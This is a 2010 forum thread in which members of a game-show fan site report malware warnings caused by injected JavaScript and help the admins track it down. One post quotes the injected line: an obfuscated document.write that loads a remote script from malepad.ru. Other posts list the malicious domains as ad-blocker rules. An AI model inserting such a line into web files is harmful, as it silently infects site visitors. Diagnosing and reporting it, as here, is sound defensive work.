Golden-Road.net
Studio 46 - Non-TPiR Discussion => Technical Support => Topic started by: Roadgeek Adam on July 23, 2010, 07:28:36 PM
-
Both my desktop and laptop are giving me an attention that the site is having problems with malware and I shouldn't proceed. I grabbed the text Chrome gave me:
The website at www.golden-road.net contains elements from the site pantscow.ru, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.
For detailed information about the problems with these elements, visit the Google Safe Browsing diagnostic page for pantscow.ru.
I know its not a Chrome thing because I was on Firefox on the laptop and an off-browser program caught the attention. Could this be looked into? Its causing headaches since the malware alert thing is also slowing down the computers.
-
I can confirm this is loading at the bottom of every page.
-
Not mine at all.
And my Firefox has AdBlock Plus.
EDIT: Viewing on IE, my Norton said an attack was blocked. So...be careful!
-
I am aware of the problem and we are working to rectify this situation currently.
Thanks to those who have brought it to our attention.
-
It happened to me, too. My WebRoot software zapped it successfully.
-
Dunno if you got it or not, but its still warning me in.
-
All warnings should now be gone...let me know if you see otherwise.
I hope that you all have a GREAT Friday night...I know I did.
-
All warnings should now be gone...let me know if you see otherwise.
I hope that you all have a GREAT Friday night...I know I did.
Nope! Thanks Marc and John, it was beginning to really annoy me. :)
-
Actually also - the CHAT tab has now been shrunk and the name is gone (mixed with Logout)
-
Seems to be fine now. I could not load the page at all because Avast flagged it, but there seem to be no issues now.
There does appear, however, to be a couple slight issues with the forum layout...the width of the actual text in posts appears to be wider than usual, causing avatars to be displayed with a scrollbar...and the "chat" link in the navigation bar at the top is weird. I don't know if some coding got broken or what...but it appears as if the entire left column is broken somewhat.
-
Maybe my using a Mac may have to do with it, but I've noticed absolutely nothing odd.
-
Another note- the FAQ and Golden Gallery are still giving me malware warnings, and the "chat" link appears to be broken altogether (clicking on the tiny box left just redirects to the main page).
The timestamps also appear to be behind one hour.
-
There does appear, however, to be a couple slight issues with the forum layout...the width of the actual text in posts appears to be wider than usual, causing avatars to be displayed with a scrollbar...and the "chat" link in the navigation bar at the top is weird. I don't know if some coding got broken or what...but it appears as if the entire left column is broken somewhat.
This is happening for me, too. No worries, though--at least John has the main part of the site running smoothly, which is fine by me. :-)
Apparently, this whole thing is caused by one extra line of Javascript in the index.php file that controls the forum. It's amazing how much trouble one line of code can cause!
I had something that just came to me off the top of my head. Everyone should probably change their passwords if they were logged in during the time the site was hijacked. I'm not sure if that malicious code compromised anyone's account security, but you can never be too safe!
Tyler
-
Things we're working on this weekend...
- Avatar sizing.
- Chat room.
- Removing whatever is infected in Gallary and FAQ.
- Ignore user
You may self-adjust your forum time in Profile-->Look & Layout Settings. Simply click on Auto Detect.
-
Ignore user -- check.
-
I will change my password only if Marc or John say we should do so.
-
Marc or John: The button that says "logout" has a small line pointing down to the left of the letter L by one space.
-
Marc or John: The button that says "logout" has a small line pointing down to the left of the letter L by one space.
Actually, that's supposed to be there...but it's supposed to go all the way down. To its left is the "Chat" button, but for some reason, it's only taking up the small amount of space to the left of the visible part of the line.
-
OK. I see. Can this be fixed?
-
it's back
-
It's now pointing to a malepad.ru...at one point it tried to load an exploit in Adobe Acrobat. It's also not in the source code (like the other one was).
-
It's happening to me too. It says it's something in the Themes directory (this coming from Avast). It says that the threat is coming from: http://www.golden-road.net/Themes/default/script.js?fin11 [L] JS:Illredir-CI [Trj] and from http://www.golden-road.net/Themes/default/xml_topic.js [L] JS:Illredir-CI [Trj]
-
Yep. Last line of that script.js file:
document.write('<s'+'cript type="text/javascript" src="http://malepad.ru:8080/Gibibyte.js"></scr'+'ipt>');
Kill it and you're good to go. Might want to change and enhance the FTP passwords, too.
It's not in the other JS file.
-
Well, just outside the edit time, but that line is also in the first JS file listed in the code for the FAQ (wikibits.js), and the "scripts.js" file for the Golden Gallery. Same line, same location in all three places.
-
Hmm...it's giving me no problems at all. Last time I couldn't even access the site at all.
-
Everything looks good on my end at the top except that chat button to open the chat isn't there.
-
Some people are saying it's fine but my avast is telling me that there is a trojon
-
At this point the forums should be back to normal. I would suggest staying away from the Gallery and the FAQ until I can take a closer look and perhaps update the software.
Marc
-
Just so you know, I tried to visit the archives and a virus was detected. Is the main forum the only known malware-free part of the site?
-
At this point the forums should be back to normal. I would suggest staying away from the Gallery and the FAQ until I can take a closer look and perhaps update the software.
Marc
Still not quite there, Chat Rooms still down.
-
Looks like the virus is still present in the archives too.
-
Got a new one. Same locations as the previous ones.
/Dear Russians: if you want PIR in your homeland, bugging us won't help
-
Has the site gotten slow for anyone else as of this post?
I'm only asking because I keep getting "waiting for obscurewax.ru"
-
It has for me. I'm also seeing "obscurewax.ru."
-
Same for me, though I'm not getting any virus warnings from Avast (likely due to running Chrome + Adblock, which is likely preventing whatever it is from loading)...but I am getting the "waiting for obscurewax.ru" message from Chrome...
Might not be a terrible idea to pull the site offline for a few days until this mess is sorted out...I remember a similar problem happening at another SMF-based forum I frequent, and it went down for a few days to get everything sorted out and had no problems afterwards.
-
Seeing it here [OSX/Firefox]. Seems to kind of bind up the page loading.
-
Every time I load a page here, it's still trying to load something from obscurewax. It does seem to be slowing down loading. Norton has been blocking it for me.
-
obscurewax and aroundpiano have both been appearing as loading for me. I've also received numerous alerts from AVG as well as Windows Defender telling me that my computer has been infected.
My best advice would be to stay away from the site for a while guys. I think Marc and CGJ need to get rid of these linkings before anyone really comes here anymore.
-
I'm getting the same requests for obscurewax.ru.
Marc & John -- does the page refer to any *.js files? You may be suffering from a script injection of some sort.
-
Hate to say the fact that my computer has been affected pretty bad. I thought it was a Facebook virus, but I guess not.
1) Pogo.com games refuse to work for me now
2) Mouse is corrupted.
3) Strange problems working with Chrome.
4) mIRC doesn't boot
Dunno what to do, the anti-virus won't run (nor do I know how). This stinks
-
I'm getting the same requests for obscurewax.ru.
Marc & John -- does the page refer to any *.js files? You may be suffering from a script injection of some sort.
Whatever problem the *.ru sites are causing is likely being executed in Java in at least some way, shape, or form. Java 6.0's splash screen popped up for me at the first (and so far, only the first) occurrence of obscurewax.ru.
-
I just got a (mercifully blocked) hit from "aroundpiano.ru"
-
...I got aroundpiano - *not* blocked - on the other computer just now. The Java splash screen came up, at which point I did a quick pull of the ethernet cable followed by a shut down. Currently offline doing scans and cleanup.
Double word score: In the process of posting that, I also got obscurewax.
-
obscurewax appears to no longer be trying to load, at least for me (and the site as a whole is working much better).
...though, I've had nothing flagged on me today...it actually kinda worries me (though I think it's just because I'm running Chrome with Adblock, which is keeping whatever obscurewax.ru was from loading, meaning Avast never got to flag it because Adblock took care of it first...either way, Avast never flagged the site and neither Avast nor Malwarebytes found anything when I ran scans earlier, not to mention my computer still seems to be working fine, so I think I'm okay...)
Hopefully this mess gets straightened out before too much major damage is done...
-
Well, if obscurewax is no longer popping up, but another site is, it is definitely a script injection.
-
Anyone using ABP add these: *obscurewax* *aroundpiano* and *aquaticwrap* and another other crappy URL's it may try to load.
Keep the *'s
-
Anyone using ABP add these: *obscurewax* *aroundpiano* and *aquaticwrap* and another other crappy URL's it may try to load.
Keep the *'s
Thank You! That works.
-
For what its worth, the problem seems to have been rectified on my computer. I updated the anti-virus software (something I've never done before) and it looks like the program handled it.
-
Anyone using ABP add these: *obscurewax* *aroundpiano* and *aquaticwrap* and another other crappy URL's it may try to load.
Keep the *'s
AdBlock Chrome seems to have handled it automatically, but I manually added those anyways. Better safe than a victim of identity theft.
AdBlock is your friend. :D
For what its worth, the problem seems to have been rectified on my computer. I updated the anti-virus software (something I've never done before) and it looks like the program handled it.
Yeah...kinda important to keep that up-to-date. If you can set it to automatically do it at a set date and time, do it. Same with scans (mine updates whenever updates are pushed out, and scans every morning at 3am.)
I haven't been getting any "waiting for somerandompieceofmaliciouscode.ru" messages, and the site seems to be running much better now (for now, at least).
-
I haven't been getting any "waiting for somerandompieceofmaliciouscode.ru" messages, and the site seems to be running much better now (for now, at least).
The Golden Gallery and Archives still get those messages.
-
AdBlock Chrome seems to have handled it automatically, but I manually added those anyways. Better safe than a victim of identity theft.
AdBlock is your friend. :D
Yeah...kinda important to keep that up-to-date. If you can set it to automatically do it at a set date and time, do it. Same with scans (mine updates whenever updates are pushed out, and scans every morning at 3am.)
I haven't been getting any "waiting for somerandompieceofmaliciouscode.ru" messages, and the site seems to be running much better now (for now, at least).
I am not the technically advanced person for my generation that most would believe. :P
-
AdBlock Chrome seems to have handled it automatically, but I manually added those anyways. Better safe than a victim of identity theft.
AdBlock is your friend. :D
ABP for Chome is slightly different to Firefox one in how it works.
I am still seeing hits on obscurewax on Golden-Gallery but obviously getting blocked with that rule.
-
Marc made a few adjustments after we sustained another hit. We will be working once again to fully rectify the site to full potential over the coming days.
We are aware that the GG, FAQ and Chat modules, as well as a few site features, are still OOS.
-
By any chance, did anybody here get a program called GameVance installed on their computer?
It appears to be adware. I don't know where it came from, apparently it made its way through McAffe. I'm not saying that it definitely came from this site, I'm just checking if anybody else has found it in recent weeks.
To the best of my knowledge, I haven't had any other unwanted programs installed in the last couple of weeks, and I visit mostly the same sites each day. I don't browse much. (Again, I'm not accusing this site of giving it to me. I just want to know if anybody else got it.)
-
I did not.
-
Me neither. A quick Google search on it to determine where it may have come from resulted in a site with that name...and a popup message from Avast saying a trojan was blocked. Therefore, it likely came from there (or some other game site), not here.
-
Ah. Thanks for the input, at least I know that G-R.net is safe to visit.
-
Has anyone had problems logging in, each time I come to the website it has logged me out and sometimes won't let me log back in.
-
I just hope the chat is back working again by the 27th and 31st of this month with the first runs coming up.
-
Nevermind.
-
The virus should be cleaned out of the site's systems wholesale at this point. If anyone else has any further troubles with it, please, post.